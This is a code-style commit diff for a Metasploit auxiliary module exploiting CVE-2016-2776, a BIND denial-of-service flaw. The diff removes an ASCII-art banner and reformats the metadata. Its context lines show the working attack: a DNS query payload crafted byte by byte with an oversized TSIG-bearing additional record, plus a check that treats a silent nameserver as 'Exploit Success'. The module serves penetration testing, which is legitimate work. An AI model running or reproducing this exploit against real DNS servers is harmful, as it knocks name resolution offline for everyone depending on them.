Fixing MSF Code Style
parent
143a4af73d
commit
c699c7c506
|
@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
[ 'CVE', '2016-2776' ],
|
[ 'CVE', '2016-2776' ],
|
||||||
[ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
|
[ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2016-09-27'
|
'DisclosureDate' => 'Sep 27 2016',
|
||||||
|
{
|
||||||
|
'ScannerRecvWindow' => 0
|
||||||
|
}
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
|
@ -45,53 +48,22 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
|
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
|
||||||
end
|
end
|
||||||
|
|
||||||
def scanner_prescan(batch)
|
|
||||||
puts '''
|
|
||||||
....
|
|
||||||
,....
|
|
||||||
..........7
|
|
||||||
7...............7
|
|
||||||
........ 7..
|
|
||||||
.I I.
|
|
||||||
.,
|
|
||||||
~...., 7.. I.
|
|
||||||
....................
|
|
||||||
......................7
|
|
||||||
........................I
|
|
||||||
........................
|
|
||||||
..........................
|
|
||||||
..........................
|
|
||||||
=...........................
|
|
||||||
............................
|
|
||||||
............................
|
|
||||||
+..........................,
|
|
||||||
..........................7
|
|
||||||
:.........................
|
|
||||||
........................
|
|
||||||
+....................,
|
|
||||||
7..................7
|
|
||||||
7~............:7
|
|
||||||
7+,,+777
|
|
||||||
'''
|
|
||||||
datastore['ScannerRecvWindow'] = 0
|
|
||||||
end
|
|
||||||
|
|
||||||
def checkServerStatus(ip, rport)
|
def checkServerStatus(ip, rport)
|
||||||
res = ""
|
res = ""
|
||||||
sudp = UDPSocket.new
|
sudp = UDPSocket.new
|
||||||
sudp.send(validQuery, 0, ip, rport)
|
sudp.send(validQuery, 0, ip, rport)
|
||||||
begin
|
begin
|
||||||
Timeout.timeout(5) do
|
Timeout.timeout(5) do
|
||||||
res = sudp.recv(100)
|
res = sudp.recv(100)
|
||||||
end
|
end
|
||||||
rescue Timeout::Error
|
rescue Timeout::Error
|
||||||
end
|
end
|
||||||
|
|
||||||
if(res.length==0)
|
if(res.length==0)
|
||||||
print_good("Exploit Success (Maybe, nameserver did not replied)")
|
print_good("Exploit Success (Maybe, nameserver did not replied)")
|
||||||
else
|
else
|
||||||
print_error("Exploit Failed")
|
print_error("Exploit Failed")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def scan_host(ip)
|
def scan_host(ip)
|
||||||
|
@ -102,13 +74,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def getDomain
|
def getDomain
|
||||||
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
|
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
|
||||||
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
|
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
|
||||||
getDomain = domain+org
|
getDomain = domain+org
|
||||||
end
|
end
|
||||||
|
|
||||||
def payload
|
def payload
|
||||||
|
|
||||||
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
|
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
|
||||||
query += "\x00\x00" # Flags: 0x0000 Standard query
|
query += "\x00\x00" # Flags: 0x0000 Standard query
|
||||||
query += "\x00\x01" # Questions: 1
|
query += "\x00\x01" # Questions: 1
|
||||||
|
@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
# Aditional records. Name
|
# Aditional records. Name
|
||||||
query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
|
query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
|
||||||
query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
|
query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
|
||||||
query += "\x00"
|
query += "\x00"
|
||||||
|
|
||||||
query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
|
query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
|
||||||
query += "\x00\xff" # Class: ANY (0x00ff)
|
query += "\x00\xff" # Class: ANY (0x00ff)
|
||||||
|
|
Loading…
Reference in New Issue